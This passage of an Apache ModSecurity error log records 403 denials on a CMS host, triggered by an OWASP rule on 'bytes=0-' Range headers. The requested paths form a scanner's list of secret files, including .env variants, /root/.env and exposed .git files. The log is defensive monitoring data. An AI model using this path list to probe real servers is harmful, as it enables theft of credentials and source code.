14425:tid 14431] [client 104.23.239.93:12955] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/env"] [unique_id "abzEw0MqeKc_GzeuAXDWQwAAAMQ"] [Fri Mar 20 05:53:39.588718 2026] [:error] [pid 14300:tid 14374] [client 104.23.239.55:9442] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/.env.local"] [unique_id "abzEw7R4r1NodKcenf6McAAAAJM"] [Fri Mar 20 05:53:39.590923 2026] [:error] [pid 17713:tid 17809] [client 104.23.239.54:9307] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.php"] [unique_id "abzEw-WNdVzdR4d4e6ZNBgAAARM"] [Fri Mar 20 05:53:39.594728 2026] [:error] [pid 26363:tid 26397] [client 104.23.239.54:9309] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env_backup"] [unique_id "abzEw94YyF1e-QDujo_qXQAAAUA"] [Fri Mar 20 05:53:39.594911 2026] [:error] [pid 26363:tid 26406] [client 104.23.239.92:12664] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.json"] [unique_id "abzEw94YyF1e-QDujo_qXgAAAUk"] [Fri Mar 20 05:53:39.599051 2026] [:error] [pid 17713:tid 17791] [client 104.23.239.54:9305] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env~"] [unique_id "abzEw-WNdVzdR4d4e6ZNBwAAAQE"] [Fri Mar 20 05:53:39.600946 2026] [:error] [pid 17713:tid 17795] [client 104.23.239.93:12963] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env1"] [unique_id "abzEw-WNdVzdR4d4e6ZNCAAAAQU"] [Fri Mar 20 05:53:39.602638 2026] [:error] [pid 26363:tid 26399] [client 104.23.239.55:9456] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env2"] [unique_id "abzEw94YyF1e-QDujo_qYAAAAUI"] [Fri Mar 20 05:53:39.602839 2026] [:error] [pid 17713:tid 17803] [client 104.23.239.92:12656] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.dist"] [unique_id "abzEw-WNdVzdR4d4e6ZNCQAAAQ0"] [Fri Mar 20 05:53:39.607024 2026] [:error] [pid 17713:tid 17800] [client 104.23.239.55:9449] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.envrc"] [unique_id "abzEw-WNdVzdR4d4e6ZNCgAAAQo"] [Fri Mar 20 05:53:39.607049 2026] [:error] [pid 14425:tid 14447] [client 104.23.239.93:12955] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.orig"] [unique_id "abzEw0MqeKc_GzeuAXDWRAAAANQ"] [Fri Mar 20 05:53:39.611864 2026] [:error] [pid 14300:tid 14339] [client 104.23.239.55:9442] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.production.bak"] [unique_id "abzEw7R4r1NodKcenf6McQAAAIA"] [Fri Mar 20 05:53:39.614043 2026] [:error] [pid 17713:tid 17799] [client 104.23.239.54:9307] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.prod"] [unique_id "abzEw-WNdVzdR4d4e6ZNCwAAAQk"] [Fri Mar 20 05:53:39.615699 2026] [:error] [pid 26363:tid 26412] [client 104.23.239.54:9309] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.docker"] [unique_id "abzEw94YyF1e-QDujo_qYQAAAU8"] [Fri Mar 20 05:53:39.615859 2026] [:error] [pid 26363:tid 26413] [client 104.23.239.92:12664] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.dev.local"] [unique_id "abzEw94YyF1e-QDujo_qYgAAAVA"] [Fri Mar 20 05:53:39.619796 2026] [:error] [pid 17713:tid 17808] [client 104.23.239.93:12963] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.container"] [unique_id "abzEw-WNdVzdR4d4e6ZNDAAAARI"] [Fri Mar 20 05:53:39.619979 2026] [:error] [pid 17713:tid 17812] [client 104.23.239.54:9305] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/docker/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZNDQAAARY"] [Fri Mar 20 05:53:39.623783 2026] [:error] [pid 17713:tid 17805] [client 104.23.239.92:12656] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/docker-compose.env"] [unique_id "abzEw-WNdVzdR4d4e6ZNDgAAAQ8"] [Fri Mar 20 05:53:39.626296 2026] [:error] [pid 26363:tid 26420] [client 104.23.239.55:9456] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/docker/.env.local"] [unique_id "abzEw94YyF1e-QDujo_qYwAAAVc"] [Fri Mar 20 05:53:39.627944 2026] [:error] [pid 17713:tid 17813] [client 104.23.239.55:9449] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/server/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZNDwAAARc"] [Fri Mar 20 05:53:39.627965 2026] [:error] [pid 14425:tid 14438] [client 104.23.239.93:12955] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/srv/.env"] [unique_id "abzEw0MqeKc_GzeuAXDWRQAAAMs"] [Fri Mar 20 05:53:39.632641 2026] [:error] [pid 26363:tid 26408] [client 104.23.239.92:12664] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/site/.env"] [unique_id "abzEw94YyF1e-QDujo_qZAAAAUs"] [Fri Mar 20 05:53:39.632678 2026] [:error] [pid 14300:tid 14364] [client 104.23.239.55:9442] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/web/.env"] [unique_id "abzEw7R4r1NodKcenf6McgAAAI0"] [Fri Mar 20 05:53:39.636353 2026] [:error] [pid 17713:tid 17793] [client 104.23.239.93:12963] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/www/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZNEAAAAQM"] [Fri Mar 20 05:53:39.638255 2026] [:error] [pid 17713:tid 17790] [client 104.23.239.92:12656] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/var/www/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZNEQAAAQA"] [Fri Mar 20 05:53:39.640361 2026] [:error] [pid 14425:tid 14429] [client 104.23.239.93:12955] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/home/.env"] [unique_id "abzEw0MqeKc_GzeuAXDWRgAAAMI"] [Fri Mar 20 05:53:39.640826 2026] [:error] [pid 17713:tid 17806] [client 104.23.239.54:9307] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/var/www/html/.env"] [unique_id "abzEw-WNdVzdR4d4e6ZNEgAAARA"] [Fri Mar 20 05:53:39.644733 2026] [:error] [pid 26363:tid 26400] [client 104.23.239.54:9309] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/root/.env"] [unique_id "abzEw94YyF1e-QDujo_qZQAAAUM"] [Fri Mar 20 05:53:39.644971 2026] [:error] [pid 17713:tid 17811] [client 104.23.239.54:9305] [client 104.23.239.54] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env_config"] [unique_id "abzEw-WNdVzdR4d4e6ZNEwAAARU"] [Fri Mar 20 05:53:39.649326 2026] [:error] [pid 26363:tid 26409] [client 104.23.239.92:12664] [client 104.23.239.92] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env_secret"] [unique_id "abzEw94YyF1e-QDujo_qZgAAAUw"] [Fri Mar 20 05:53:39.651008 2026] [:error] [pid 17713:tid 17804] [client 104.23.239.93:12963] [client 104.23.239.93] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env_settings"] [unique_id "abzEw-WNdVzdR4d4e6ZNFAAAAQ4"] [Fri Mar 20 05:53:39.651354 2026] [:error] [pid 26363:tid 26407] [client 104.23.239.55:9456] [client 104.23.239.55] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.cms-1.dev-unit.com"] [uri "/.env.local.backup"] [unique_id "abzEw94YyF1e-QDujo_qZwAAAUo"] [Fri Mar 20 07:44:59.949330 2026] [:error] [pid 17713:tid 17796] [client 172.70.250.215:11573] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/logs/HEAD"] [unique_id "abze2-WNdVzdR4d4e6YXswAAAQY"] [Fri Mar 20 07:44:59.952758 2026] [:error] [pid 17713:tid 17797] [client 172.70.251.104:10165] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/config"] [unique_id "abze2-WNdVzdR4d4e6YXtQAAAQc"] [Fri Mar 20 07:44:59.953119 2026] [:error] [pid 17713:tid 17808] [client 172.70.250.214:14229] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/refs/heads/master"] [unique_id "abze2-WNdVzdR4d4e6YXtgAAARI"] [Fri Mar 20 07:44:59.954625 2026] [:error] [pid 17713:tid 17814] [client 172.70.250.214:14234] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/refs/heads/main"] [unique_id "abze2-WNdVzdR4d4e6YXtwAAARg"] [Fri Mar 20 07:44:59.954844 2026] [:error] [pid 17713:tid 17794] [client 172.70.251.103:10629] [client 172.70.251.103] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/index"] [unique_id "abze2-WNdVzdR4d4e6YXuAAAAQQ"] [Fri Mar 20 07:44:59.955851 2026] [:error] [pid 14299:tid 14336] [client 172.70.251.147:12155] [client 172.70.251.147] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/HEAD"] [unique_id "abze24gHLbuvz2RS3ZspWgAAAEU"] [Fri Mar 20 07:44:59.964888 2026] [:error] [pid 17713:tid 17791] [client 172.70.250.215:11573] [client 172.70.250.215] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.local"] [unique_id "abze2-WNdVzdR4d4e6YXuQAAAQE"] [Fri Mar 20 07:44:59.965167 2026] [:error] [pid 17713:tid 17806] [client 172.70.250.214:14229] [client 172.70.250.214] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.production"] [unique_id "abze2-WNdVzdR4d4e6YXugAAARA"] [Fri Mar 20 07:44:59.966509 2026] [:error] [pid 17713:tid 17810] [client 172.70.251.104:10165] [client 172.70.251.104] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-1500"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.env.development"] [unique_id "abze2-WNdVzdR4d4e6YXuwAAARQ"] [Fri Mar 20 07:44:59.966769 2026] 